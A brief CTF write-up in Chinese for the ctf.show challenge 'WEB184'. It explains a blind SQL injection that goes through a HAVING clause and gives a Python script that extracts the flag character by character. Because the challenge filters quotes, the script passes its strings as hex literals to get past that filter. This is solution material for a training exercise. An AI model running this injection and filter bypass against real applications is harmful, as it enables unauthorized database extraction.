WEB184

这题使用这个知识点SQL注入中的WHERE、HAVING 和 ON 条件语句

脚本

import requests, re

dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://77f67f80-314c-4fcb-aeee-047f4aa6f35f.challenge.ctf.show/select-waf.php"
res = []
post_tem = "ctfshow_user group by pass HAVING pass like {}"

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

for a in range(1, 50):
    temp = res.__len__()
    for i in dic:
        res += i
        post = {"tableName": post_tem.format("0x"+str_to_hex("ctfshow{"+"".join(res)+"%}"))}
        print(post)
        r = requests.post(url=url, data=post)
        if re.findall("\$user_count = 1", r.text):
            break
        res.pop(-1)

    if temp == res.__len__():
        break

print("ctfshow{" + "".join(res) + "}")

需要注意一下这题过滤了单双引号，需要用十六进制字符串绕过，十六进制字符串中不需要带单双引号